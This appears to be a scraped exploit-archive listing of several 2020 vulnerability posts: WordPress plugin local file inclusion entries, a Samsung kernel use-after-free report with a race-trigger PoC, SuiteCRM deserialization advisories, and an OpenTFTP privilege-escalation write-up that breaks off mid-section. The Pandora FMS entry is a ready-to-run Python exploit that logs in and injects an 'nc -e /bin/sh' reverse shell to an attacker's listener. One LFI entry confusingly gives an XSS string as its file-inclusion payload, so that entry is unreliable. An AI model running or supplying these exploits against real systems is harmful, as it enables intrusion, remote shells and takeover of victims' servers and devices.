Channel: Exploit Collector

WordPress Tutor 1.5.3 Local File Inclusion


WordPress Tutor plugin version 1.5.3 suffers from a local file inclusion vulnerability.


MD5 | bf2a1f50d693986a725beee46977f714

[-] Title: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
[-] Author: mehran feizi
[-] Category: webapps
[-] Date: 2020.02.12
[-] vendor home page: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor()->path . "views/pages/{$sub_page}.php";
7: include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
(the plugin appends ".php" to the value and checks file_exists() before the include, so the
sub_page value, directory traversal included, must resolve to an existing .php file)
=================================================================================
contact me:
telegram: @MF0584
gmail: mehranfeizi13841384@gmail.com


Samsung Kernel PROCA Use-After-Free / Double-Free


The Samsung kernel has a logic bug and locking issues in PROCA that can lead to use-after-free and double-free conditions triggerable from an application's context.


MD5 | 4809998625c6770bf24721a33e8e7f18


Samsung SEND_FILE_WITH_HEADER Use-After-Free


The Samsung kernel suffers from a use-after-free vulnerability due to a missing lock in the SEND_FILE_WITH_HEADER ioctl handler in f_mtp_samsung.c.


MD5 | c32b0a6b8edad815d87eab3aadeb33e9

Samsung: UAF via missing locking in SEND_FILE_WITH_HEADER handler in f_mtp_samsung.c

Tested on a Samsung A50 (SM-A505FN), running build
"samsung/a50xx/a50:9/PPR1.180610.011/A505FNXXS3ASK9:user/release-keys", security
patch level 2019-11-01.


Samsung's kernel tree contains two implementations of device-side MTP. One of
them (drivers/usb/gadget/function/f_mtp.c), based on its copyright headers,
seems to be from Google, but this one is disabled at build time.
The second one is drivers/usb/gadget/function/f_mtp_samsung.c.
Both of them have ioctl handlers that handle the ioctl command
SEND_FILE_WITH_HEADER; the Google version runs this handler under a lock, the
Samsung version doesn't hold any locks at this point.

In both MTP implementations, the SEND_FILE_WITH_HEADER handler first looks up a
file from a user-supplied file descriptor, then stashes a pointer to that file
in a struct, posts work to a workqueue to actually send data from the file to
the USB device, waits for the work item to be processed, and then drops its
reference on the file.


By the way, this entire dance with the work queue is probably completely
unnecessary. The Google version of the code has a comment that says:

/* We do the file transfer on a work queue so it will run
* in kernel context, which is necessary for vfs_read and
* vfs_write to use our buffers in the kernel address space.
*/

But that's wrong - if you want to do read/write with kernel buffers, you can
just use kernel_read()/kernel_write() instead of vfs_read()/vfs_write() and
everything should work just fine. (Or on older kernels before v4.14, use
set_fs(KERNEL_DS) manually.)


The problem is that the Samsung version runs this code without holding any
locks:

file = fget(info.Fd);
if (!file) {
    status = -EBADF;
    printk(KERN_DEBUG "[%s] line=[%d] bad file number\n",
           __func__, __LINE__);
    goto exit;
}

dev->read_send_file = file;
dev->read_send_length = info.Length;
smp_wmb();

work = &dev->read_send_work;
dev->read_send_cmd = info.Code;
dev->read_send_id = info.TransactionID;
queue_work(dev->wq, work);
/* Wait for the work to be complted on work queue */
flush_workqueue(dev->wq);

fput(file);

This means that two threads can race like this (prefixed with a thread
identifier):

[1] file = fget(info.Fd);
[1] if (!file) {
[1]     status = -EBADF;
[1]     printk(KERN_DEBUG "[%s] line=[%d] bad file number\n",
[1]            __func__, __LINE__);
[1]     goto exit;
[1] }
[1]
[1] dev->read_send_file = file;
[1] dev->read_send_length = info.Length;
[1] smp_wmb();
[2] file = fget(info.Fd);
[2] if (!file) {
[2]     status = -EBADF;
[2]     printk(KERN_DEBUG "[%s] line=[%d] bad file number\n",
[2]            __func__, __LINE__);
[2]     goto exit;
[2] }
[2]
[2] dev->read_send_file = file;
[2] dev->read_send_length = info.Length;
[2] smp_wmb();
[2]
[2] work = &dev->read_send_work;
[2] dev->read_send_cmd = info.Code;
[2] dev->read_send_id = info.TransactionID;
[2] queue_work(dev->wq, work);
[2] /* Wait for the work to be complted on work queue */
[2] flush_workqueue(dev->wq);
[2]
[2] fput(file);
[1]
[1] work = &dev->read_send_work;
[1] dev->read_send_cmd = info.Code;
[1] dev->read_send_id = info.TransactionID;
[1] queue_work(dev->wq, work);
[1] /* Wait for the work to be complted on work queue */
[1] flush_workqueue(dev->wq);
[1]
[1] fput(file);

If a race like this occurs, then by the time thread [1] reaches queue_work(),
dev->read_send_file no longer holds a reference and may have already been freed.
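To make the interleaving above concrete without a phone, here is an added userspace model of the handler (example code written for this edit; it is neither Samsung's kernel code nor the Project Zero PoC). It assumes a stripped-down struct file with only a refcount and a freed flag, models the lock that the Google version holds as a single owner field, and replays the exact [1]/[2] schedule shown above once against the unlocked handler and once against a locked one. The worker step reads dev->read_send_file rather than the caller's own file, which is the whole bug:

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Stand-ins for struct file and the bits of the MTP device state involved. */
struct file { int refcount; bool freed; };
struct mtp_dev {
    struct file *read_send_file;  /* the pointer the handler stashes */
    int lock_owner;               /* -1 = free; models the lock the Samsung handler lacks */
};

static void fget_model(struct file *f) { f->refcount++; }
static void fput_model(struct file *f) { if (--f->refcount == 0) f->freed = true; }

/* One ioctl caller walks these steps in order (OPEN/CLOSE are the PoC's
 * open()/close() around the ioctl; FGET..FPUT is the handler itself). */
enum step { OPEN, FGET, STASH, QUEUE, FPUT, CLOSE, DONE };
struct caller { int id; struct file file; enum step pc; };

/* Advance one caller by one step. Returns true when the worker (QUEUE) finds
 * the stashed file already freed, which is what read_send_work() hit on the
 * phone. With with_lock, FGET..FPUT run under a lock; a caller that cannot
 * take it stays on FGET (blocked) and gives up this turn. */
static bool advance(struct mtp_dev *dev, struct caller *c, bool with_lock) {
    bool uaf = false;
    switch (c->pc) {
    case OPEN:
        c->file.refcount = 1;
        c->file.freed = false;
        break;
    case FGET:
        if (with_lock) {
            if (dev->lock_owner != -1 && dev->lock_owner != c->id)
                return false;                 /* blocked on the lock */
            dev->lock_owner = c->id;
        }
        fget_model(&c->file);
        break;
    case STASH:
        dev->read_send_file = &c->file;       /* overwrites whatever was there */
        break;
    case QUEUE:
        /* the work item uses dev->read_send_file, not the caller's own file */
        uaf = dev->read_send_file != NULL && dev->read_send_file->freed;
        break;
    case FPUT:
        fput_model(&c->file);
        if (with_lock) dev->lock_owner = -1;
        break;
    case CLOSE:
        fput_model(&c->file);                 /* last reference: file is freed */
        break;
    case DONE:
        return false;
    }
    c->pc = (enum step)(c->pc + 1);
    return uaf;
}

/* Run an explicit interleaving: sched[i] is the caller that gets the next
 * turn. Afterwards both callers run to completion round-robin, which is what
 * happens once a lock holder releases. */
static bool run_schedule(const int *sched, size_t n, bool with_lock) {
    struct mtp_dev dev = { .read_send_file = NULL, .lock_owner = -1 };
    struct caller c[2] = { { .id = 0, .pc = OPEN }, { .id = 1, .pc = OPEN } };
    bool uaf = false;
    for (size_t i = 0; i < n; i++)
        uaf |= advance(&dev, &c[sched[i]], with_lock);
    for (bool progress = true; progress;) {
        progress = false;
        for (int id = 0; id < 2; id++) {
            enum step before = c[id].pc;
            if (before != DONE) uaf |= advance(&dev, &c[id], with_lock);
            progress |= c[id].pc != before;
        }
    }
    return uaf;
}

/* The interleaving from the report: [1] stashes its file, [2] runs the whole
 * handler and closes its file, then [1] queues the work item. */
static const int race_schedule[] = { 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0 };
#define RACE_LEN (sizeof(race_schedule) / sizeof(race_schedule[0]))

bool race_without_lock(void) { return run_schedule(race_schedule, RACE_LEN, false); }
bool race_with_lock(void)    { return run_schedule(race_schedule, RACE_LEN, true); }

int main(void) {
    printf("unlocked handler, racing interleaving: %s\n",
           race_without_lock() ? "worker used a freed file" : "ok");
    printf("locked handler,   same interleaving:   %s\n",
           race_with_lock() ? "worker used a freed file" : "ok");
    return 0;
}
```

The model is deterministic on purpose: the real PoC needs 32 processes hammering the ioctl to hit the window, while here the schedule array is the window. Swapping the schedule for a sequential one (all of caller 0, then all of caller 1) returns false even without the lock, which is the reproduction case the report says needs the racing threads.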


To reproduce this, you need to have a rooted phone.
Next, you need to run a helper on the host that consumes all the incoming USB
bulk messages on the MTP interface. Code for the helper:

================================================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <err.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <linux/usbdevice_fs.h>
#include <linux/usb/ch9.h>

int main(int argc, char **argv) {
  if (argc != 4) {
    printf("usage: %s /dev/bus/usb/<bus>/<device> <interface-id> <endpoint-id (0-15)>\n",
           argv[0]);
    return 1;
  }
  int fd = open(argv[1], O_RDWR);
  if (fd == -1) err(1, "open('%s')", argv[1]);
  int interface = strtol(argv[2], NULL, 0);
  int endpoint = strtol(argv[3], NULL, 0);
  /* claim the MTP interface so we are allowed to issue bulk transfers on it */
  if (ioctl(fd, USBDEVFS_CLAIMINTERFACE, &interface))
    err(1, "claim interface");
  while (1) {
    /* drain every bulk IN message the phone sends on the MTP endpoint */
    char buf[0x200];
    struct usbdevfs_bulktransfer transfer = {
      .ep = endpoint | USB_DIR_IN,
      .len = sizeof(buf),
      .data = buf
    };
    int len = ioctl(fd, USBDEVFS_BULK, &transfer);
    if (len < 0) {
      err(1, "USBDEVFS_BULK");
    } else {
      printf("got %d\n", len);
    }
  }
}
================================================================================

To use the helper, you need the bus and device numbers from lsusb. On this device the
interface ID (bInterfaceNumber) and endpoint ID (bEndpointAddress & 0xf) are 0 and 1, but
you can confirm them with lsusb as well. Usage example:

================================================================================
$ lsusb | grep Samsung
Bus 001 Device 092: ID 04e8:6860 Samsung Electronics Co., Ltd Galaxy series, misc. (MTP mode)
$ lsusb -d 04e8:6860 -v | egrep 'Interface Descriptor|bInterfaceNumber|iInterface|Endpoint Descriptor|bEndpointAddress'
Interface Descriptor:
bInterfaceNumber 0
iInterface 5 MTP
Endpoint Descriptor:
bEndpointAddress 0x81 EP 1 IN
Endpoint Descriptor:
bEndpointAddress 0x01 EP 1 OUT
Endpoint Descriptor:
bEndpointAddress 0x82 EP 2 IN
Interface Descriptor:
bInterfaceNumber 1
iInterface 6 CDC Abstract Control Model (ACM)
Endpoint Descriptor:
bEndpointAddress 0x84 EP 4 IN
Interface Descriptor:
bInterfaceNumber 2
can't get debug descriptor: Resource temporarily unavailable
iInterface 7 CDC ACM Data
Endpoint Descriptor:
bEndpointAddress 0x83 EP 3 IN
Endpoint Descriptor:
bEndpointAddress 0x02 EP 2 OUT
Interface Descriptor:
bInterfaceNumber 3
iInterface 10 ADB Interface
Endpoint Descriptor:
bEndpointAddress 0x03 EP 3 OUT
Endpoint Descriptor:
bEndpointAddress 0x85 EP 5 IN
$ gcc -o usbread usbread.c && ./usbread /dev/bus/usb/001/092 0 1
================================================================================

Now compile the following PoC for the phone:
================================================================================
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <err.h>
#include <stdlib.h>
#include <assert.h>
#include <string.h>
#include <stdint.h>
#include <stdbool.h>
#include <sched.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>

/* from kernel headers */
struct read_send_info {
  int Fd;                 /* Media File fd */
  uint64_t Length;        /* the valid size, in BYTES, of the container */
  uint16_t Code;          /* Operation code, response code, or Event code */
  uint32_t TransactionID; /* host generated number */
};
#define SEND_FILE_WITH_HEADER 11

/* print error and abort if syscall returned error code */
#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if ((long)__res == -1)      \
    err(1, "SYSCHK: %s", #x); \
  __res;                      \
})

// ensure that when the main process is killed via something like ^C, the entire
// process tree dies relatively quickly
static void set_pdeathsig(void) {
  SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
  if (getppid() == 1) errx(1, "parent went away immediately");
}

static int dev_fd = -1;

// open a file, hand its fd to the unlocked ioctl handler, close it again;
// 32 processes looping on this make the stash/fput windows overlap
static void collide(void) {
  while (1) {
    int data_fd = SYSCHK(open("/system/bin/sh", O_RDONLY));
    struct read_send_info info = {
      .Fd = data_fd,
      .Length = 1
    };
    ioctl(dev_fd, SEND_FILE_WITH_HEADER, &info);
    close(data_fd);
  }
}

int main(void) {
  dev_fd = SYSCHK(open("/dev/usb_mtp_gadget", O_RDWR));
  for (int i=0; i<31; i++) {
    pid_t child = SYSCHK(fork());
    if (child == 0) {
      set_pdeathsig();
      collide();
      return 0;
    }
  }
  collide();

  return 0;
}
================================================================================

Compile and use it like this:

================================================================================
$ aarch64-linux-gnu-gcc -static -o samsung_mtp_trigger samsung_mtp_trigger.c -Wall
$ adb push samsung_mtp_trigger /data/local/tmp/
samsung_mtp_trigger: 1 file pushed. 17.2 MB/s (578328 bytes in 0.032s)
$ adb shell
a50:/ $ su
a50:/ # ps -AZ | grep Mtp
u:r:system_app:s0 system 7587 4068 4272384 163484 ep_poll 0 S com.samsung.android.MtpApplication
a50:/ # kill 7587
a50:/ # /data/local/tmp/samsung_mtp_trigger
$
================================================================================

... and now your phone should crash pretty quickly (something like a second).


To demonstrate that this is actually a UaF, here are snippets from last_kmsg:

================================================================================
<0>[13278.841349] [3: kworker/u16:9:17680] Unable to handle kernel read from unreadable memory at virtual address 00000160
[...]
<4>[13278.841899] [3: kworker/u16:9:17680] CPU: 3 PID: 17680 Comm: kworker/u16:9 Tainted: G W 4.14.62-16641116 #1
<4>[13278.841910] [3: kworker/u16:9:17680] Hardware name: Samsung A50 SWA OPEN rev04 board based on Exynos9610 (DT)
<4>[13278.841941] [3: kworker/u16:9:17680] Workqueue: mtp_read_send read_send_work
<4>[13278.841954] [3: kworker/u16:9:17680] task: ffffffc012aa6300 task.stack: ffffff800cf28000
<4>[13278.841969] [3: kworker/u16:9:17680] PC is at rw_verify_area+0x2c/0xc4
<4>[13278.841980] [3: kworker/u16:9:17680] LR is at vfs_read+0x78/0x138
<4>[13278.841991] [3: kworker/u16:9:17680] pc : [<ffffff80082caa0c>] lr : [<ffffff80082cacf4>] pstate: 00400145
<4>[13278.842001] [3: kworker/u16:9:17680] sp : ffffff800cf2bc90
<4>[13278.842011] [3: kworker/u16:9:17680] x29: ffffff800cf2bca0 x28: 000000000000000c
<4>[13278.842024] [3: kworker/u16:9:17680] x27: 0000000000000000 x26: 0000000000000000
<4>[13278.842037] [3: kworker/u16:9:17680] x25: ffffffc02e164c00 x24: ffffff80090bd369
<4>[13278.842050] [3: kworker/u16:9:17680] x23: ffffffc012aa6300 x22: ffffffc01d41800c
<4>[13278.842063] [3: kworker/u16:9:17680] x21: 0000000000000001 x20: 0000000000000000
<4>[13278.842075] [3: kworker/u16:9:17680] x19: ffffffc800e5b680 x18: 000000000000270f
<4>[13278.842088] [3: kworker/u16:9:17680] x17: 0000000000484728 x16: 0000000000000000
<4>[13278.842101] [3: kworker/u16:9:17680] x15: 00000000000000e6 x14: 0000000000000058
<4>[13278.842114] [3: kworker/u16:9:17680] x13: 000000000003a700 x12: dead000000000200
<4>[13278.842127] [3: kworker/u16:9:17680] x11: dead000000000100 x10: 0000000000000000
<4>[13278.842140] [3: kworker/u16:9:17680] x9 : 0000000000000001 x8 : ffffffffffffffff
<4>[13278.842153] [3: kworker/u16:9:17680] x7 : 682b6874656c2009 x6 : ffffff80f61229b6
<4>[13278.842166] [3: kworker/u16:9:17680] x5 : 0000000000004510 x4 : 000000000000000c
<4>[13278.842178] [3: kworker/u16:9:17680] x3 : 0000000000000001 x2 : 0000000000000000
<4>[13278.842191] [3: kworker/u16:9:17680] x1 : ffffffc800e5b680 x0 : 0000000000000000
[...]
<4>[13278.845924] [3: kworker/u16:9:17680] X19: 0xffffffc800e5b580:
[...]
<4>[13278.846172] [3: kworker/u16:9:17680] b680 : 00000000 00000000 082CEE70 FFFFFF80 00000000 00000000 00000000 00000000
<4>[13278.846200] [3: kworker/u16:9:17680] b6a0 : 00000000 00000000 08D55700 FFFFFF80 00000000 00000000 00000000 00000000
<4>[13278.846228] [3: kworker/u16:9:17680] b6c0 : 00020000 0802801D 00000000 00000000 00000000 00000000 00E5B6D8 FFFFFFC8
<4>[13278.846256] [3: kworker/u16:9:17680] b6e0 : 00E5B6D8 FFFFFFC8 00000000 00000000 00000000 00000000 00000000 00000000
<4>[13278.846285] [3: kworker/u16:9:17680] b700 : 00000000 00000000 00000000 00000000 7F56D500 FFFFFFC8 00000000 00000000
<4>[13278.846313] [3: kworker/u16:9:17680] b720 : 00000000 00000000 00000020 00000000 FFFFFFFF FFFFFFFF 00000000 00000000
<4>[13278.846341] [3: kworker/u16:9:17680] b740 : 00000000 00000000 00000000 00000000 00E5B750 FFFFFFC8 00E5B750 FFFFFFC8
<4>[13278.846369] [3: kworker/u16:9:17680] b760 : 00E5B760 FFFFFFC8 00E5B760 FFFFFFC8 6458BCF0 FFFFFFC8 00000000 00000000
================================================================================

The crash is in rw_verify_area() and is caused by file->f_inode being NULL. The
file pointer is in X19; by looking at X19, we can see that it indeed looks like
a struct file that was just freed (some pointers have been nulled by __fput(),
and the refcount is zero):

================================================================================
(labels: on the b680 line the 3rd and 4th 64-bit words are mnt and dentry; on the b6a0
line the 1st, 2nd and 4th 64-bit words are inode, f_op and counter)
<4>[13278.846172] [3: kworker/u16:9:17680] b680 : 00000000 00000000 082CEE70 FFFFFF80 00000000 00000000 00000000 00000000
<4>[13278.846200] [3: kworker/u16:9:17680] b6a0 : 00000000 00000000 08D55700 FFFFFF80 00000000 00000000 00000000 00000000
<4>[13278.846228] [3: kworker/u16:9:17680] b6c0 : 00020000 0802801D 00000000 00000000 00000000 00000000 00E5B6D8 FFFFFFC8
<4>[13278.846256] [3: kworker/u16:9:17680] b6e0 : 00E5B6D8 FFFFFFC8 00000000 00000000 00000000 00000000 00000000 00000000
<4>[13278.846285] [3: kworker/u16:9:17680] b700 : 00000000 00000000 00000000 00000000 7F56D500 FFFFFFC8 00000000 00000000
<4>[13278.846313] [3: kworker/u16:9:17680] b720 : 00000000 00000000 00000020 00000000 FFFFFFFF FFFFFFFF 00000000 00000000
<4>[13278.846341] [3: kworker/u16:9:17680] b740 : 00000000 00000000 00000000 00000000 00E5B750 FFFFFFC8 00E5B750 FFFFFFC8
<4>[13278.846369] [3: kworker/u16:9:17680] b760 : 00E5B760 FFFFFFC8 00E5B760 FFFFFFC8 6458BCF0 FFFFFFC8 00000000 00000000
================================================================================


Reporting this as a security bug since /dev/usb_mtp_gadget is reachable from a
privileged, but not-root-equivalent context:

a50:/ # ls -laZ /dev/usb_mtp_gadget
crw-rw---- 1 system mtp u:object_r:mtp_device:s0 10, 27 2019-12-14 03:12 /dev/usb_mtp_gadget

(allow mediaprovider mtp_device (chr_file (ioctl read write getattr lock append map open)))


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.




Found by: jannh@google.com


SweynTooth Bluetooth Exploits


SweynTooth captures a family of 12 vulnerabilities (more under non-disclosure) across different Bluetooth Low Energy (BLE) software development kits (SDKs) of six major system-on-a-chip (SoC) vendors. The vulnerabilities expose flaws in specific BLE SoC implementations that allow an attacker in radio range to trigger deadlocks, crashes and buffer overflows or completely bypass security depending on the circumstances.


MD5 | 042ed03928785582be3b2d73a5d65d5a


WordPress Ultimate-Member 2.1.3 Local File Inclusion


WordPress Ultimate-Member plugin version 2.1.3 suffers from a local file inclusion vulnerability.


MD5 | 024ba882272c907c80a19e55a4273f14

[-] Title  : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
[-] Author : mehran feizi
[-] Category : Webapps
[-] Date : 2020-02-11
[-] vendor home page: https://wordpress.org/plugins/ultimate-member/

Vulnerable Page:
/class-admin-upgrade.php


Vulnerable Source:
354: if(empty($_POST['pack'])) { /* ... */ } else
356: include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';


Exploit:
POST to localhost/wp-content/plugins/ultimate-member/includes/admin/core/class-admin-upgrade.php
with the body parameter pack set to the payload, e.g. pack=<script>alert('xss')</script>
(since DIRECTORY_SEPARATOR . 'init.php' is appended, the value must resolve to a directory
that contains an init.php)

SuiteCRM 7.11.11 Second-Order PHP Object Injection


SuiteCRM versions 7.11.11 and below suffer from a second-order php object injection vulnerability.


MD5 | ea4d3494a5be75e5e45932ce2189d4c2

---------------------------------------------------------------------
SuiteCRM <= 7.11.11 Second-Order PHP Object Injection Vulnerabilities
---------------------------------------------------------------------


[-] Software Link:

https://suitecrm.com/


[-] Affected Versions:

Version 7.11.11 and prior versions.


[-] Vulnerabilities Description:

1) The vulnerability exists because the "EmailsControllerActionGetFromFields::getEmailSignatures()"
method is using the unserialize() function with the "account_signatures" user preference, and
such a value can be arbitrarily manipulated by evil users through the EmailUIAjax interface.
This can be exploited to inject arbitrary PHP objects into the application scope, allowing an
attacker to perform a variety of attacks, such as executing arbitrary PHP code.

2) The vulnerability exists because the "EmailsControllerActionGetFromFields::handleActionGetFromFields()"
method is using the unserialize() function with the "showFolders" user preference, and such a
value can be arbitrarily manipulated by evil users through the EmailUIAjax interface. This can
be exploited to inject arbitrary PHP objects into the application scope, allowing an attacker
to perform a variety of attacks, such as executing arbitrary PHP code.


[-] Solution:

No official solution is currently available.


[-] Disclosure Timeline:

[19/09/2019] - Vendor notified
[20/09/2019] - Vendor acknowledgement
[12/11/2019] - Vendor contacted again asking for updates, no response
[20/01/2020] - Vendor notified about public disclosure intention, no
response
[07/02/2020] - CVE number assigned
[12/02/2020] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2020-8800 to these vulnerabilities.


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2020-01




SuiteCRM 7.11.11 Phar Deserialization


SuiteCRM versions 7.11.11 and below suffer from multiple phar deserialization vulnerabilities.


MD5 | 40555272df9e2fe2b9399bbc7bb54c0a

-----------------------------------------------------------------
SuiteCRM <= 7.11.11 Multiple Phar Deserialization Vulnerabilities
-----------------------------------------------------------------


[-] Software Link:

https://suitecrm.com/


[-] Affected Versions:

Version 7.11.11 and prior versions.


[-] Vulnerabilities Description:

1) User input passed through the "backup_dir" parameter when handling the "Backups" action
within the "Administration" module is not properly sanitized before being used in a file
operation. This can be exploited by malicious users to inject arbitrary PHP objects into
the application scope (PHP Object Injection via phar:// stream wrapper), allowing them to
carry out a variety of attacks, such as executing arbitrary PHP code. Successful
exploitation of this vulnerability requires a System Administrator account.

2) User input passed through the "file_name" parameter when handling the "step3" action
within the "Import" module is not properly sanitized before being used in a file operation.
This can be exploited by malicious users to inject arbitrary PHP objects into the application
scope (PHP Object Injection via phar:// stream wrapper), allowing them to carry out a variety
of attacks, such as executing arbitrary PHP code.

3) User input passed through the "load_module_from_dir" parameter when handling the
"UpgradeWizard" action within the "Administration" module is not properly sanitized before
being used in a file operation. This can be exploited by malicious users to inject arbitrary
PHP objects into the application scope (PHP Object Injection via phar:// stream wrapper),
allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.
Successful exploitation of this vulnerability requires a System Administrator account.

4) User input passed through the "file_name" parameter when handling the "UploadFileCheck"
action within the "UpgradeWizard" module is not properly sanitized before being used in a
file operation. This can be exploited by malicious users to inject arbitrary PHP objects
into the application scope (PHP Object Injection via phar:// stream wrapper), allowing them
to carry out a variety of attacks, such as executing arbitrary PHP code. Successful
exploitation of this vulnerability would require a System Administrator account.
However, due to KIS-2020-04 it could be exploited by any user.


[-] Solution:

No official solution is currently available.


[-] Disclosure Timeline:

[19/09/2019] - Vendor notified
[20/09/2019] - Vendor acknowledgement
[12/11/2019] - Vendor contacted again asking for updates, no response
[20/01/2020] - Vendor notified about public disclosure intention, no
response
[07/02/2020] - CVE number assigned
[12/02/2020] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2020-8801 to these vulnerabilities.


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2020-02




Pandora FMS 7.0 Authenticated Remote Code Execution


Pandora FMS version 7.0 suffers from an authenticated remote code execution vulnerability.


MD5 | c3b198639fda25e23a0dfdf49744d535

# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
# Date: 2020-02-12
# Exploit Author: Engin Demirbilek
# Vendor homepage: http://pandorafms.org/
# Version: 7.0
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Tested on: CentOS
# CVE: CVE-2020-8947

#!/usr/bin/env python3
'''
PANDORAFMS 7.0 Authenticated Remote Code Execution x4
This exploit can be edited to trigger any of the four authenticated RCE vulnerabilities in PANDORAFMS.
If the default vulnerable parameter does not work, move the payload to one of ip_src, dst_port or src_port.

Author: Engin Demirbilek
Github: github.com/EnginDemirbilek
CVE: CVE-2020-8947

'''
import sys
import requests

if len(sys.argv) < 6:
    print("Usage: ./exploit.py http://url username password listenerIP listenerPort")
    sys.exit(1)

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
# close the quoted argument, run a reverse shell to the listener, comment out the rest
cmd = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' #'

login = {
    'nick': user,
    'pass': password,
    'login_button': 'Login'
}
req = requests.Session()
print("[+] Sending login request ...")
req.post(url + "/pandora_console/index.php?login=1", data=login)

# netflow live view form; ip_dst is the field that reaches the shell unescaped
payload = {
    'date': "",
    'time': "",
    'period': "",
    'interval_length': "",
    'chart_type': "",
    'max_aggregates': "1",
    'address_resolution': "0",
    'name': "",
    'assign_group': "0",
    'filter_type': "0",
    'filter_id': "0",
    'filter_selected': "0",
    'ip_dst': cmd,
    'ip_src': "",
    'dst_port': "",
    'src_port': "",
    'advanced_filter': "",
    'aggregate': "dstip",
    'router_ip': "",
    'output': "bytes",
    'draw_button': "Draw"
}

print("[+] Sending exploit ...")

exploit = req.post(
    url + "/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",
    data=payload,
    headers={
        'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded'})

if exploit.status_code == 200:
    print("[+] Everything seems ok, check your listener. If no connection is established, move the payload to ip_src, dst_port or src_port.")
else:
    print("[-] Couldn't send the HTTP request, try again.")


SuiteCRM 7.11.11 Bean Manipulation


SuiteCRM versions 7.11.11 and below suffer from an action_saveHTMLField bean manipulation vulnerability.


MD5 | 5b37a8d65609f140a2d503b2ba0f5aea

--------------------------------------------------------------------------
SuiteCRM <= 7.11.11 (action_saveHTMLField) Bean Manipulation
Vulnerability
--------------------------------------------------------------------------


[-] Software Link:

https://suitecrm.com/


[-] Affected Versions:

Version 7.11.11 and prior versions.


[-] Vulnerability Description:

The vulnerability exists because the "HomeController::action_saveHTMLField()" method allows
creating new beans or modifying arbitrary beans' fields. This can result in second-order SQL
Injection or PHP Object Injection attacks.


[-] Solution:

No official solution is currently available.


[-] Disclosure Timeline:

[19/09/2019] - Vendor notified
[20/09/2019] - Vendor acknowledgement
[12/11/2019] - Vendor contacted again asking for updates, no response
[20/01/2020] - Vendor notified about public disclosure intention, no
response
[07/02/2020] - CVE number assigned
[12/02/2020] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2020-8802 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2020-03




OpenTFTP 1.66 Local Privilege Escalation


OpenTFTP version 1.66 suffers from a local privilege escalation vulnerability.


MD5 | 4c237a98f5dd3ec8ed985d7311aa35bc

# Exploit Title:   OpenTFTP 1.66 - Local Privilege Escalation
# Exploit Author: boku
# Date: 2020-02-12
# Vendor Homepage: https://sourceforge.net/projects/tftp-server/
# Software Link: https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download
# Version: 1.66
# Tested On: Windows 10 (32-bit)

# About:
# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges,
# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available."
# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/

# Vulnerability Details:
# On Windows, Open TFTP Server v1.66 suffers from insecure file & folder permissions.
# This allows a low-privilege, local attacker to escalate their privileges to Administrator
# by replacing the 'TFTPServer' service binary with a maliciously-crafted executable.
# The TFTP Server runs as an 'AUTO_START' service with 'LocalSystem' privileges after the
# default installation. After the attacker has planted the malicious binary, the code will
# be executed with SYSTEM privileges on the next boot of the Windows device. See PoC below for details.

## Service Information (the BINARY_PATH_NAME is also unquoted, although with no spaces in it that is not exploitable on its own)
C:\>sc qc TFTPServer
SERVICE_NAME: TFTPServer
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\OpenTFTPServer\OpenTFTPServerSP.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Open TFTP Single Port Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

## Insecure Folder Permission
C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

## Insecure File/Service Permission
